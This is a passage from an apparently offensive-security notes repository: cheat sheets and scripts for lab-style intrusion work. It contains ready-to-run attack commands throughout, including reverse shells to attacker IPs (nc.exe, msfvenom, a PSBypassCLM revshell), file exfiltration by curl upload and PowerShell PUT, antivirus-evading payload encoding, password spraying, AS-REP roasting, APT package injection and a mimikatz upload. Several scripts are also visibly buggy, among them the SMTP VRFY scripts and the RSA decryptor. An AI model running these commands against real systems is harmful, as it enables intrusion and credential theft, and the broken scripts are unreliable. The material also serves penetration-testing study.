11 | 	example: curl http://10.10.23.14:8080 -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4NzQ3NDQ5LCJleHAiOjE1Njg4MzM4NDl9.4NcWjm_9t8UsnoqVCBtv4bXsvXyL5qdKtg1Di8C3Pac'
12 | 


--------------------------------------------------------------------------------
/remote_connection/winrm.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/ruby
 2 | 
 3 | require 'winrm'
 4 | opts = { 
 5 |   endpoint: 'http://<targetIP>:5985/wsman',
 6 |   user: '<user>',
 7 |   password: '<password>'
 8 | }
 9 | conn = WinRM::Connection.new(opts)
10 | #conn.shell(:cmd) do |shell|
11 | conn.shell(:powershell) do |shell|
12 |   #output = shell.run("\\<attackerIP>\<sharename>\nc.exe <attackerIP> <port> -e <command>") do |stdout, stderr|
13 |   output = shell.run("<powershellCommand|cmdCommand>") do |stdout, stderr|
14 |     STDOUT.print stdout
15 |     STDERR.print stderr
16 |   end
17 |   puts "The script exited with exit code #{output.exitcode}"
18 | end
19 | 


--------------------------------------------------------------------------------
/development/cross-compile.txt:
--------------------------------------------------------------------------------
 1 | Install cross-compiler: apt-get install mingw-w64
 2 | 
 3 | Cross-compile source code from linux to windows 32-bit:
 4 | 
 5 | 	syntax : /usr/bin/i686-w64-mingw32-gcc <sourceFile> -o <outFile>
 6 | 	example: /usr/bin/i686-w64-mingw32-gcc vuln.c -o vuln.exe
 7 | 
 8 | 
 9 | Cross-compile source code from linux to windows 64-bit:
10 | 
11 | 	syntax : x86_64-w64-mingw32-gcc <sourceFile> -o <outFile> 
12 | 	example: x86_64-w64-mingw32-gcc shell.c -o shell.exe
13 | 
14 | 
15 | Compile a C/C++ file for 32-bit:
16 | 
17 | 	syntax : gcc <sourceFile> -o <outFile> -m32
18 | 	example: gcc kernelExploit.c -o kernelExploit -m32
19 | 


--------------------------------------------------------------------------------
/remote_connection/winrm.txt:
--------------------------------------------------------------------------------
 1 | Connect to a Windows box via winrm (port 5985) by either directly accessing or port-forwarding the port:
 2 | If you want to use winrm with an ipv6 ip address, add the address to /etc/hosts and use that given domain name 
 3 | as parameter after -i for evil-winrm.
 4 | 
 5 | 
 6 | 	Via program:
 7 | 
 8 | 		Step 1: gem install evil-winrm
 9 | 		Step 2: evil-winrm -i <targetIP> -u <victimUser> -p <victimPass>
10 | 
11 | 	Via winrm.rb script with victim's user and password creds:
12 | 
13 | 		See ./winrm.rb
14 | 
15 | 	Via winrm.rb with victim user and key .pem file (extracted from cert)
16 | 
17 | 		See ./winrm_cert.rb
18 | 


--------------------------------------------------------------------------------
/azure_ad/initial_access.txt:
--------------------------------------------------------------------------------
 1 | Inspired by Pentester Academy - Attacking and Defending Azure Active Directory
 2 | Ways to get initial access into Azure Active Directory:
 3 | 
 4 |     Password spray on previously enumerated email accounts:
 5 |         Step 1: clone https://github.com/dafthack/MSOLSpray
 6 |         Step 2: import module into Powershell session
 7 |             example: Import-Module C:\Tools\MSOLSpray\MSOLSpray.ps1
 8 |         Step 3:
 9 |             syntax : Invoke-MSOLSpray -UserList <emailList> -Password <password> -Verbose
10 |             example: Invoke-MSOLSpray -UserList emails.txt -Password 'Sup3rS3cureP@ss!' -Verbose
11 | 
12 | 
13 | 


--------------------------------------------------------------------------------
/networking/packets/capturePackets.py:
--------------------------------------------------------------------------------
 1 | from scapy.all import *;
 2 | 
 3 | file = sys.argv[1];
 4 | packets = rdpcap(file);
 5 | 
 6 | # print only the raw part of the ICMP packet
 7 | #print(packets[1][Raw]);
 8 | 
 9 | # print only the ICMP part of the ICMP packet with extra info (ls)
10 | #print(ls(packets[0][ICMP]));
11 | 
12 | # print the last 16 characters of the packet, with packets that send 2 bytes at a time, use -4
13 | #print(packets[1][Raw].load[-16:]);
14 | 
15 | 
16 | for packet in packets:
17 | 	print(packet.load[-4:]);
18 | ##
19 | 
20 | 
21 | # check if it's actually ICMP
22 | #if packets[0].haslayer(ICMP):
23 | #	print("true");
24 | ##
25 | 
26 | 
27 | 


--------------------------------------------------------------------------------
/package_injection/package_injection.txt:
--------------------------------------------------------------------------------
 1 | https://versprite.com/blog/apt-mitm-package-injection/
 2 | 
 3 | To run this attack, you need to be able to do `sudo apt-get update/sudo apt-get upgrade` on the target machine.
 4 | 
 5 | 
 6 | Setup http proxy:
 7 | 
 8 | 	Step 1(victim):
 9 | 
10 | 		syntax : export http_proxy='http://<attackerIP>:80'
11 | 		example: export http_proxy='http://192.168.122.132:80'
12 | 
13 | 	Step 2(attacker):
14 | 
15 | 		syntax : php -S <attackerIP>:80
16 | 		example: php -S 192.168.122.132:80	# or `python -m SimpleHTTPServer 80`
17 | 
18 | 	Step 3(victim):
19 | 
20 | 		example: sudo apt-get update
21 | 		example: sudo apt-get upgrade
22 | 


--------------------------------------------------------------------------------
/databases/nosql/mongo/mongo.txt:
--------------------------------------------------------------------------------
 1 | MongoDB is a no-sql database
 2 | 
 3 | Install mongo on kali (https://docs.mongodb.com/v3.0/tutorial/install-mongodb-on-linux/) :
 4 | 
 5 | 	Step 1: curl -O https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-3.0.15.tgz
 6 | 	Step 2: tar -zxvf mongodb-linux-x86_64-3.0.15.tgz
 7 | 
 8 | 
 9 | Use mongo to connect to a remote server:
10 | 	
11 | 	syntax : mongo -u <user> -p <pass> <targetIP>:27017/<collectionName>
12 | 	example: mongo -u daryl -p Cr055BoW 10.10.23.41:27017/clients
13 | 
14 | 
15 | Use mongo to connect to a local server with creds:
16 | 	
17 | 	syntax : mongo -p -u <user> <database>
18 | 	example: mongo -p -user aladeen clients
19 | 


--------------------------------------------------------------------------------
/bruteforce/password-spray.txt:
--------------------------------------------------------------------------------
 1 | All kinds of tools to use for online password spraying
 2 | 
 3 | Use atomizer to bruteforce email accounts (https://github.com/byt3bl33d3r/SprayingToolkit):
 4 |     syntax : atomizer.py <mailService> <mailServer> <password> <emailList>
 5 |     example: atomizer.py owa mail.ecorp.io Washington2020 emails.txt
 6 | 
 7 |     syntax : atomizer.py <mailService> <mailServer> <passwordList> <emailList> --interval <H:M:S>
 8 |     example: atomizer.py owa mail.ecorp.io passwords.txt emails.txt --interval 0:0:1       
 9 |              # after trying a password for all emails in the list, wait one second and then
10 |                continue with the next password
11 | 


--------------------------------------------------------------------------------
/filetransfer/nginx_file_transfer.txt:
--------------------------------------------------------------------------------
 1 | https://www.youtube.com/watch?v=7ifJOon5-G8 @ 15:00 	#Ippsec Olympus htb
 2 | 
 3 | Uploading files via nginx:
 4 | 
 5 | 	Linux:
 6 | 		syntax : curl --upload-file <file> <hostIP>:<port>
 7 | 		example: curl --upload-file creds.txt 10.12.15.67:9090
 8 | 
 9 | 	Windows powershell:
10 | 		Step 1(target) : $text = Get-Content .\<file> -Raw
11 | 		Optional step 1: $text = [IO.File]::ReadAllText(".\<file>")
12 | 		
13 | 		syntax : powershell -c 'Invoke-RestMethod -Method <method> -Uri "http://<hostIP>:<port>/<file>" -Body $<variable>'
14 | 		example: powershell -c 'Invoke-RestMethod -Method PUT -Uri "http://10.13.12.20:9090/file.txt" -Body $text'
15 | 		
16 | 


--------------------------------------------------------------------------------
/networking/tcpdump.txt:
--------------------------------------------------------------------------------
 1 | Capture all traffic on given interface:
 2 | 
 3 | 	syntax : tcpdump -i <interface>	
 4 | 	example: tcpdump -i tun0 icmp
 5 | 		 # Only listen for icmp protocol (pings...)
 6 | 
 7 | 
 8 | Read packets from a file:
 9 | 
10 | 	syntax : tcpdump -r <file>
11 | 	example: tcpdump -r secrets.pcap
12 | 
13 | 
14 | Dump traffic in hex format:
15 | 
16 | 	syntax : tcpdump -nX -r <file>
17 | 	example: tcpdump -nX -r secrets.pcap 
18 | 
19 | 
20 | Filter traffic:
21 | 
22 | 	syntax : tcpdump -n '<filter'
23 | 	example: tcpdump -A -n 'tcp[13] = 24 && tcp port 110' -i tun0	
24 | 		 # -A prints output in ASCII, we filter only for ACK and PSH flags and traffic on port 110 on interface tun0
25 | 


--------------------------------------------------------------------------------
/scripts/smtpVrfyUsers.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | import socket
 4 | import sys
 5 | 
 6 | if len(sys.argv) != 3:
 7 | 	print 'Usage: python ' + sys.argv[0] + ' <targetIP> <username>'
 8 | 	print 'Only works on vulnerable machines with port 25 open'
 9 | 	sys.exit(0)
10 | ###
11 | 
12 | targetIP = sys.argv[1]
13 | username = sys.argv[2]
14 | 
15 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Create the socket
16 | connect = s.connect((targetIP, 25))	# Connect to the smtp (port 25) server
17 | 
18 | banner = s.recv(1024)
19 | print banner
20 | 
21 | s.send('VRFY ' + sys.argv[username] + '\r\n') # Verify a user
22 | results = s.recv(1024)
23 | print result
24 | 
25 | s.close	# Close the socket
26 | 


--------------------------------------------------------------------------------
/binary_exploitation/buffer_overflow/windows/slMail.txt:
--------------------------------------------------------------------------------
 1 | Install SLMail 5.5 from this link:
 2 | 
 3 | 	https://www.exploit-db.com/apps/12f1ab027e5374587e7e998c00682c5d-SLMail55_4433.exe
 4 | 	Just click 'next' everywhere for the install
 5 | 
 6 | 
 7 | Setup SLMail to be exploited:
 8 | 
 9 | 	Step 1: open port 110 by adding new inbound/outbound rules or shut down firewall entirely
10 | 	Step 2: run 'slmail configuration' as administrator
11 | 	Step 3: run 'immunity debugger' as administrator
12 | 	Step 4: attach the slmail process to immunity with 'File -> Attach'
13 | 	Step 5: start the slmail with the 'play' button
14 | 	Step 6: run exploit
15 | 	Step 7: restart slmail service via config panel when needed
16 | 	
17 | 


--------------------------------------------------------------------------------
/git/git.txt:
--------------------------------------------------------------------------------
 1 | All kinds of commands for extracting information from a git repository (.git file)
 2 | When you see a directory that has a readable .git file, you can copy it and extract information/files from it.
 3 | 
 4 | 	Check commit history:
 5 | 
 6 | 		example: git log
 7 | 
 8 | 	Rollback to a commit:
 9 | 
10 | 		syntax : git checkout <commitHash>
11 | 		example: git checkout 9a34c5182bc4b76084fe5b1fa456a7e38da72dfc
12 | 
13 | 	Recover files marked as deleted by git:
14 | 
15 | 		Step 1: git status	-> see deleted files
16 | 		Step 2: git ls-tree <branch>		# git ls-tree master
17 | 		Step 3: git reset -- <filePath>		# git reset -- ./sensitive.txt
18 | 		Step 4: git checkout -- <filePath>	# git checkout -- ./sensisitve.txt
19 | 


--------------------------------------------------------------------------------
/pivoting/sshuttle.txt:
--------------------------------------------------------------------------------
 1 | Use sshuttle to tunnel to a network that is not reachable by your attacking pc via a compromised machine:
 2 | 
 3 | 	syntax : sshuttle -r <victim>@<victimIP> <targetNetwork>
 4 | 	example: sshuttle -r manager@10.24.3.3 10.22.22.0/24
 5 | 	example: sshuttle -r manager@10.24.3.3 10.22.22.0/24 --ssh-cmd 'ssh -i /home/keys/manager.rsa'	# for when you need to use an RSA key to connect 
 6 | 		 # 10.24.3.3 is a machine that we compromised, 10.22.22.0/24 is the network
 7 | 		   we want to access on our attacking box through the compromised machine 
 8 | 
 9 |     # After this, you can just access the internal network as if it were a public one, so you can just do `nmap -Pn 10.22.22.150` from your host machine
10 | 


--------------------------------------------------------------------------------
/pivoting/socat.txt:
--------------------------------------------------------------------------------
 1 | Socat can be used to open ports on a Linux host to the outside
 2 | 
 3 | Host a binary on a port:
 4 |     syntax : socat <protocol>:<port>,reuseaddr,fork EXEC:<binary>
 5 |     example: socat TCP4-LISTEN:60000,reuseaddr,fork EXEC:/opt/vulnerable
 6 | 
 7 | Expose a remote, internal port to the outside via a SOCKS proxy:
 8 |     syntax : proxychains socat <protocol>:<port>,fork TCP:<remoteIP>:<remotePort>
 9 |     example: proxychains socat TCP4-Listen:9001,fork TCP:10.10.110.11:443
10 |     
11 |     # now we can access this port on our Windows VM, for example
12 |     # if our Linux machine hosting the socat is 192.168.150.105, then
13 |     # we can go to https://192.168.150.105:443 on our Windows machine
14 | 
15 | 


--------------------------------------------------------------------------------
/filetransfer/ftp_commands.txt:
--------------------------------------------------------------------------------
 1 | Transfer via ftp from a windows box:
 2 | 
 3 | Step 1(attacker): sudo python -m pyftpdlib -p 21	##or don't specify port and it uses 2121
 4 | Step 2(victim)	: echo the following commands into a file, then run that file with ftp
 5 | 
 6 | ### Note that there's no spaces between the commands and the '>>' operator, this is required for the script to work!
 7 | echo "open <attacker-ip>">>ftper
 8 | echo "<username>">>ftper		##anonymous
 9 | echo "<password>">>ftper		##anonymous (anything works)
10 | echo "passive">>ftper
11 | echo "binary">>ftper
12 | echo "get <file>">>ftper
13 | #echo "put <file>">>ftper
14 | echo "disconnect">>ftper
15 | #echo "quit">>ftper 
16 | #echo "bye">>ftper
17 | 
18 | ftp -v -s:ftper
19 | 


--------------------------------------------------------------------------------
/recon/iis_shortname.txt:
--------------------------------------------------------------------------------
 1 | Microsoft IIS has a vulnerability that allows unauthorized information disclosure by scanning web directories 
 2 | using the '~' character in a certain way to scan for file shortnames.
 3 | 
 4 | Using IIS-Shortname-Scanner (https://github.com/irsdl/IIS-ShortName-Scanner), we can automate this process:
 5 | 
 6 | 	syntax : java -jar iis_shortname_scanner.jar <showProgress> <threads> <url> > <outFile>
 7 | 	example: java -jar iis_shortname_scanner.jar 2 20 http://vulnerable.org/admin/ > /root/iis_scan.txt
 8 | 
 9 | 	If the result is something like ADM_PASS~1.txt, that means there's a file that could be adm_password.txt
10 | 	or adm_passwords1.txt, so it still takes some extra guessing/scanning to get the right files.
11 | 


--------------------------------------------------------------------------------
/recon/wpscan.txt:
--------------------------------------------------------------------------------
 1 | Wpscan is an enumeration tool used to scan wordpress sites for vulnerabilities
 2 | 
 3 | 	Scan wordpress site for plugins:
 4 | 		syntax : wpscan --url <targetUrl> -e <flag>
 5 | 		example: wpscan --url http://website.com/wp -e ap
 6 | 
 7 | 	Enumerate usernames:
 8 | 		syntax : wpscan --url <targetUrl> --enumerate u
 9 | 		example: wpscan --url http://172.17.174.3 --enumerate u
10 | 
11 | 	Bruteforce a login:
12 | 		syntax : wpscan --url <targetUrl> --passwords <dictionary> --usernames <username>
13 | 		example: wpscan --url http://172.17.174.3 --usernames admin --passwords /usr/share/wordlists/rockyou.txt
14 |         example: wpscan --url http://172.17.174.3 -i usernames.txt --passwords /usr/share/wordlists/rockyou.txt
15 | 


--------------------------------------------------------------------------------
/filetransfer/smb.txt:
--------------------------------------------------------------------------------
 1 | Transfer files via smb:
 2 | 
 3 | Step 1(attacker)  : 	  sudo python /opt/smbserver.py <attackerIP> <sharename> <path>	### sudo python /opt/smbserver.py 10.10.x.x TEST /root/Desktop
 4 | Optional(attacker): 	  smbclient -L <attackerIP> --no-pass 	### check connection
 5 | Optional(victim)  :	  net view \\<attackerIP>
 6 | Step 2(victim)    :	  copy \\<attackerIP>\<sharename>\file.exe ./
 7 | 
 8 | 
 9 | OR Windows:
10 | 
11 | Step 1(attacker): 	  sudo impacket-smbserver <shareName> ./	# sudo impacket-smbserver -smb2support files ./
12 | Step 2(victim)  :	  powershell -nop -c 'xcopy \\<attackerIP>\<shareName>\<file> C:\\Users\<user>\AppData\Local\Temp\'
13 | Alternate step 2(victim): copy \\<attackerIP>\<shareName>\<file> ./ 
14 | 


--------------------------------------------------------------------------------
/windows/constrained_powershell_bypass.txt:
--------------------------------------------------------------------------------
1 | When you find yourself in a powershell with 'ConstrainedLanguage', use these steps to escape (https://github.com/padovah4ck/PSByPassCLM)
2 | 
3 | 	Check language mode: $ExecutionContext.SessionState.LanguageMode
4 | 
5 | 	Step 1(host)  : Python -m SimpleHTTPServer	#in PSByPassCLM/bin/x64/debug
6 | 	Step 2(target): download PsBypassCLM.exe
7 | 	Step 3(target):	execute a subshell:    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\<path>\PsBypassCLM.exe
8 | 	Step 3(target): execute reverse shell: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=<hostIP> /rport=<port> /U c:\<path>\PsBypassCLM.exe
9 | 


--------------------------------------------------------------------------------
/scripts/smbver.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | #Author: rewardone
 3 | #Description:
 4 | # Requires root or enough permissions to use tcpdump
 5 | # Will listen for the first 8 packets of a null login
 6 | # and grab the SMB Version
 7 | #Notes:
 8 | # Will sometimes not capture or will print multiple
 9 | # lines. May need to run a second time for success.
10 | if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
11 | if [ ! -z $2 ]; then rport=$2; else rport=139; fi
12 | tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 10 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
13 | echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
14 | echo "" && sleep .1
15 | 


--------------------------------------------------------------------------------
/filetransfer/windows/winrm.txt:
--------------------------------------------------------------------------------
 1 | Download and upload files via winrm:
 2 | 
 3 | 	Step 1: Connect to the windows box via winrm
 4 | 		# evil-winrm -i <victimIP> -u <victimUser> -p <victimPass>
 5 | 	
 6 | 	Download: While in the evil-winrm shell, download files from the victim box (Windows) to the attacker box (Kali Linux)
 7 | 		syntax : download <victimPath> <attackerPath>
 8 | 		example: download C:\Users\Administrator\Documents\secrets.txt /home/hackerman/loot/secrets.txt
 9 | 
10 | 	Upload: While in the evil-winrm shell, upload files from the attacker box (Kali Linux) to the victim box (Windows)
11 | 		syntax : upload <attackerPath> <victimPath>
12 | 		example: upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe C:\Windows\Temp\mimikatz.exe
13 | 


--------------------------------------------------------------------------------
/filetransfer/nginx_setup.txt:
--------------------------------------------------------------------------------
 1 | https://www.youtube.com/watch?v=7ifJOon5-G8 @ 15:00	#Ippsec Olympus htb
 2 | 
 3 | Setting up nginx for file uploads:
 4 | 	
 5 | 	Step 1(host): mkdir /var/www/upload
 6 | 	Step 2(host): touch /etc/nginx/sites-available/file_upload
 7 | 	Step 3(host): enter the following in 'file_upload':
 8 | 
 9 | 		server {
10 | 			listen 9090 default_server;
11 | 			server_name hackerman.com;
12 | 			location / {
13 | 				root /var/www/upload;
14 | 				dav_methods PUT;
15 | 			}
16 | 		}
17 | 
18 | 
19 | 	Step 4(host): ln -s /etc/nginx/sites-available/file_upload /etc/nginx/sites-enabled/file_upload
20 | 	Step 5(host): systemctl <restart/start/stop> nginx
21 | 	Step 6(host): chown www-data /var/www/upload/
22 | 	Step 7(host): chmod 777 /var/www/upload/
23 | 


--------------------------------------------------------------------------------
/development/nasm.txt:
--------------------------------------------------------------------------------
 1 | Use nasm to compile Assembly programs:
 2 | 
 3 | 	Compile x86 Assembly for Linux:
 4 | 		Step 1: nasm -f elf32 <asmFile>.asm -o <outFile>.o
 5 | 		Step 2: ld -m elf_i386 <outFile>.o -o <outFileExec>
 6 | 		Optional:
 7 | 		Step 2: gcc -m32 <outFile>.o -o <outFileExec>	
 8 | 				# use this if you're using external functions from C (use `global main`, instead of `global _start`)
 9 | 
10 |     Compile x86_64 Assembly for Linux:
11 |         Step 1: nasm -f elf64 <asmFile>.asm -o <outFile>.o
12 |         Step 2: ld -m elf_x86_64 <outFile>.o -o <outFileExec>
13 |         Optional:
14 |         Step 2: gcc <outFile>.o -o <outFileExec>
15 |                 # use this if you're using external functions from C (use `global main`, instead of `global _start`)
16 | 
17 | 


--------------------------------------------------------------------------------
/reverse_shell/msfvenom.txt:
--------------------------------------------------------------------------------
 1 | Generate reverse shell payloads to execute on a victim box:
 2 | 	
 3 | 	syntax : msfvenom -a <arch> --platform <OS> -p <payload> LHOST=<hostIP> LPORT <hostPort> -f <fileType> -o <outputFile>
 4 | 	example: msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.12.15.117 LPORT=6697 -f exe -o venom.exe
 5 | 
 6 | 
 7 | Generate encoded reverse shell payloads to bypass antivirus and exclude bad characters:	
 8 | 	
 9 | 	syntax : msfvenom -a <arch> --platform <OS> -p <payload> LHOST=<hostIP> LPORT=<hostPort> -e <encoder> -b '<badChars>' -f <fileType> -v <variableName>
10 | 	example: msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.0.124 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f python -v shellcode
11 | 


--------------------------------------------------------------------------------
/windows/active_directory/asreproasting.txt:
--------------------------------------------------------------------------------
 1 | ASREP roasting is a technique that exploits Kerberos for user accounts that do not require pre-authentication.
 2 | https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
 3 | 
 4 | Get encrypted TGT for offline bruteforcing:
 5 | https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py
 6 | 
 7 | 	syntax : python GetNPUsers.py <domain>/ -usersfile <usernames> -outputfile <outFile> -dc-ip <domainControllerIP>
 8 | 	example: python GetNPUsers.py ECORP/ -usersfile usernames.txt -outputfile tgt.txt -dc-ip 10.11.1.245
 9 | 	
10 | 	syntax : python GetNPUsers.py <domain>/<username> -outputfile <outFile> -dc-ip <domainControllerIP>
11 | 	example: python GetNPUsers.py eSec/tyrone1 -outputfile tgt.txt -dc-ip 10.11.1.245
12 | 
13 | 


--------------------------------------------------------------------------------
/binary_exploitation/buffer_overflow/egg_hunting/info.txt:
--------------------------------------------------------------------------------
 1 | info about egghunting: https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
 2 | ippsec bighead video : https://www.youtube.com/watch?v=VBt-CmjMYiM
 3 | 
 4 | If you are doing binary exploitation and the target buffer size is too small for your whole payload, you will want to use an egghunter.
 5 | 
 6 | 
 7 | Find egg via mona in immunity debugger:
 8 | 
 9 | 	# "w00tw00t" is a common string used as an egg (deadbeef aswell)
10 | 	syntax : !mona find -type asc -s "<egg>"
11 | 	example: !mona find -type asc -s "w00t"
12 | 
13 | Create egghunter via mona in immunity debugger:
14 | 
15 | 	# If your egg is "w00tw00t", it suffices to only specify "w00t"
16 | 	syntax : !mona egg -t "<egg>"
17 | 	example: !mona egg -t "w00t"
18 | 


--------------------------------------------------------------------------------
/bruteforce/generateWordlist.txt:
--------------------------------------------------------------------------------
 1 | CAREFUL! Crunch can create very big files in the GB's very quickly. Use the -o flag with care!
 2 | 
 3 | Use crunch to generate wordlists:
 4 | 
 5 | 	syntax : crunch <minLength> <maxLength> <characterSet>
 6 | 	example: crunch 1 6 abcdABCDE
 7 | 
 8 | 	syntax : crunch <minLength> <maxLength> -t <pattern>
 9 | 	example: crunch 1 3 -t @@,%
10 | 
11 | 		@ will insert lower case characters
12 | 		, will insert upper case characters
13 | 		% will insert numbers
14 | 		^ will insert symbols
15 | 
16 | 
17 | Use crunch to generate a wordlist from existing character sets(check the file for possible character sets):
18 | 
19 | 	syntax : crunch <minLength> <maxLength> -f <charSetFile> <charSet> -o <outFile>
20 | 	example: crunch 1 4 -f /usr/share/crunch/charset.lst lalpha -o dictionary.txt
21 | 
22 | 


--------------------------------------------------------------------------------
/smb/smbclient.txt:
--------------------------------------------------------------------------------
 1 | Connect to Samba shares (if using hashed password, use the '--pw-nt-hash' flag:
 2 | 
 3 | 	syntax:  smbclient \\\\<workgroup>\\<share> -U <user>%<pass> (--pw-nt-hash(password hashing type)) -I <targetIP>
 4 | 	example: smbclient \\\\WORKGROUP1\\general -U tyrone%testpass5 -I 10.10.10.123
 5 | 	
 6 | 
 7 | List all available shares:
 8 | 
 9 | 	syntax : smbclient -U <user>%<pass> (--pw-nt-hash) -L <targetIP>      #the pw hash is only necssary when using an nt hashed password
10 | 	example: smbclient -U tyrone%3242816cd42bdb6d50f7fb89313f5c48 --pw-nt-hash -L 10.12.15.78
11 | 
12 | Recursively list all available content within a share:
13 | 
14 |     syntax : smbclient -U <user>%'<pass>' \\\\<targetIP>\\<share> -c '<cmd>'
15 |     example: smbclient -U tyrone%'E_CORPP4ss$' \\\\10.10.10.192\\SYSVOL -c 'recurse;ls'
16 | 


--------------------------------------------------------------------------------
/bruteforce/padbusterCookie.txt:
--------------------------------------------------------------------------------
1 | padbuster is a tool that can bruteforce encrypted cookies by using a 'padding oracle' attack:
2 | 
3 | 	syntax : padbuster <targetUrl> <targetCookie> <blockSize> -cookies "<allCookies>"
4 | 	example: padbuster http://docker.website.com/profile.php NuXFiQ1LQh%2FAHvp3mC4oPSwTf9dnWmWRd%2B7HinimmStKA6hpR4dyyw%3D%3D 8 -cookies "suspicious=NuXFiQ1LQh%2FAHvp3mC4oPSwTf9dnWmWRd%2B7HinimmStKA6hpR4dyyw%3D%3D;PHPSESSID=hbbcjl7pg3pp25qlm15jlu6pf5"
5 | 
6 | 	Then after we find the format of the cookie, we put it at the end as '-plaintext':
7 | 
8 | 	padbuster http://docker.website.com/profile.php NuXFiQ1LQh%2FAHvp3mC4oPSwTf9dnWmWRd%2B7HinimmStKA6hpR4dyyw%3D%3D 8 -cookies "suspicious=NuXFiQ1LQh%2FAHvp3mC4oPSwTf9dnWmWRd%2B7HinimmStKA6hpR4dyyw%3D%3D;PHPSESSID=hbbcjl7pg3pp25qlm15jlu6pf5" -plaintext {"user":"nomad","role":"admin"}"
9 | 


--------------------------------------------------------------------------------
/scripts/decryptRSA.py:
--------------------------------------------------------------------------------
 1 | def egcd(a, b):
 2 |     x,y, u,v = 0,1, 1,0
 3 |     while a != 0:
 4 |         q, r = b//a, b%a
 5 |         m, n = x-u*q, y-v*q
 6 |         b,a, x,y, u,v = a,r, u,v, m,n
 7 |         gcd = b
 8 |     return gcd, x, y
 9 | 
10 | def main():
11 | 
12 |     p = 1090660992520643446103273789680343
13 |     q = 1162435056374824133712043309728653
14 |     e = 65537
15 |     ct = 299604539773691895576847697095098784338054746292313044353582078965
16 | 
17 |     # compute n
18 |     n = p * q
19 | 
20 |     # Compute phi(n)
21 |     phi = (p - 1) * (q - 1)
22 | 
23 |     # Compute modular inverse of e
24 |     gcd, a, b = egcd(e, phi)
25 |     d = a
26 | 
27 |     print( "n:  " + str(d) );
28 | 
29 |     # Decrypt ciphertext
30 |     pt = pow(ct, d, n)
31 |     print( "pt: " + str(pt) )
32 | 
33 | if __name__ == "__main__":
34 |     main()
35 | 


--------------------------------------------------------------------------------
/ldap/recon.txt:
--------------------------------------------------------------------------------
 1 | Use a GUI tool like JXplorer to browse LDAP (doesn't always work that well)
 2 | 
 3 | Use ldapsearch to enumerate the LDAP service via command-line 
 4 | (https://devconnected.com/how-to-search-ldap-using-ldapsearch-examples/):
 5 | 
 6 | 	syntax : ldapsearch -x -b "<search_base>" -H "<ldap_host>"
 7 | 	example: ldapsearch -x -b "dc=ecorp,dc=com" -H "ldap://13.15.18.23"
 8 | 
 9 | 	with authentication (-W for password prompt):
10 | 	syntax : ldapsearch -x -b "<search_base>" -H "<ldap_host>" -D "<user>" -W
11 | 	example: ldapsearch -x -b "dc=ecorp,dc=com" -H "ldap://13.15.18.23" -D "cn=tyrell,dc=ecorp,dc=com" -W
12 | 
13 | 	with filter:
14 | 	syntax : ldapsearch -x -b "<search_base>" -H "<ldap_host>" "<filter>"
15 | 	example: ldapsearch -x -b "dc=ecorp,dc=com" -H "ldap://13.15.18.23" "objectClass=user"	# returns all objects with 'objectClass=user'
16 | 
17 | 


--------------------------------------------------------------------------------
/scripts/smtpVrfyUserList.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | import socket
 4 | import sys
 5 | 
 6 | if len(sys.argv) != 3:
 7 | 	print 'Usage: python ' + sys.argv[0] ' <targetIP> <usernameList>'
 8 |         print 'Provide a file with usernames line by line as <usernameList>'
 9 | 	print 'Only works on machines with port 25 open'
10 | 	sys.exit(0)
11 | ###
12 | 
13 | targetIP = sys.argv[1]
14 | userList = sys.argv[2]
15 | 
16 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Create the socket
17 | connect = s.connect((targetIP, 25))	              # Connect to the smtp (port 25) server
18 | 
19 | banner = s.recv(1024)
20 | print banner
21 | 
22 | with open(userList) as fp:
23 |     for line in fp:
24 |         s.send('VRFY ' + line + '\r\n') # Verify a user
25 |         results = s.recv(1024)
26 |         print result
27 | ###
28 | 
29 | s.close	# Close the socket
30 | 


--------------------------------------------------------------------------------
/smb/rpcclient.txt:
--------------------------------------------------------------------------------
 1 | Use rpcclient to connect to smb and gather info on a Windows system 
 2 | 
 3 | 
 4 | Use rpcclient to gather OS version, users and much more:
 5 | 	
 6 | 	Step 1:
 7 | 		syntax : rpcclient -U <user>%'<password>' <targetIP>
 8 | 		example: rpcclient -U '' 10.13.41.51
 9 |         example: rpcclient -U tyrone%'TyR0n3dd' 10.13.41.51
10 | 
11 |     Help      : help
12 | 	OS info	  : srvinfo
13 | 	users  	  : enumdomusers
14 | 	passPolicy: getdompwinfo
15 |     privileges: enumprivs
16 | 
17 | Change the password of a user (with the right privileges and in rpcclient session)
18 | 
19 |     syntax : setuserinfo2 <username> <level> <newPassword>
20 |     example: setuserinfo2 svc_backup 23 Passw0rd!
21 |     # For the <level> parameter: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/6b0dff90-5ac0-429a-93aa-150334adabf6?redirectedfrom=MSDN
22 | 


--------------------------------------------------------------------------------
/reverse_shell/interactive_shell.txt:
--------------------------------------------------------------------------------
 1 | When you get a reverse shell on a linux box, you want a nice, interactive shell. We follow these steps to make this reality:
 2 | 
 3 | Step 1: python -c 'import pty;pty.spawn("/bin/bash")'	or python3 -c 'import pty;pty.spawn("/bin/bash")'
